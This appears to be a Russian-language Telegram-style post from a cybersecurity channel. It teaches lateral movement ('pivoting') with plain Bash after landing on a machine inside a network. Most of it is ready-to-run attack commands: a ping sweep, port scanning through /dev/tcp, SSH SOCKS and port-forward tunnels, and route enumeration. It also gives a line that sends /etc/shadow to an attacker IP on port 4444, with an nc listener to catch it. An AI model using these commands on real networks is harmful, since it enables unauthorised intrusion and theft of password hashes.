ZeroDay | Кибербезопасность
Bash для пивотинга в сети 👋 Приветствую в мире цифровой безопасности! Попали на машину внутри сети. Дальше нужно двигаться, но инструментов нет. Разберём, что можно сделать чистым Bash. ⏺ Находим соседей без nmap: for ip in 10.10.10.{1..254}; do ping -c1 -W1 $ip &>/dev/null && echo "$ip" & done; wait Фоновые процессы ускоряют скан. На /24 уходит секунд 10-15. ⏺ Проверяем порты через /dev/tcp: for h in $(cat live.txt); do for p in 22 80 443 445 3389 8080; do (echo >/dev/tcp/$h/$p) &>/dev/null && echo "$h:$p"; done; done Никаких бинарей. Работает везде, где есть Bash. ⏺Туннель через SSH без ProxyChains: ssh -D 1080 -N -f user@pivot_host SOCKS5 на localhost:1080. Если есть SSH на промежуточной машине - этого достаточно для дальнейшего движения. ⏺ Проброс порта через SSH: ssh -L 5432:db_host:5432 -N user@pivot_host База данных во внутренней сети становится доступна на локальном 5432. Полезно, когда нужен прямой доступ к сервису. ⏺Передача файлов без curl и wget: cat /etc/shadow > /dev/tcp/АТАКУЮЩИЙ_IP/4444 На принимающей стороне: nc -lvnp 4444 > shadow. Чистый Bash, никаких зависимостей. ⏺Ищем маршруты во внутренние подсети: ip route; cat /etc/hosts; arp -n | awk '{print $1}' Часто на пивот-хосте уже есть маршруты в нужные сегменты. Смотрим перед тем, как делать что-то сложнее. Zeroday - https://max.ru/cybersec_academy
Если у вас установлено приложение,
вы можете сразу перейти в канал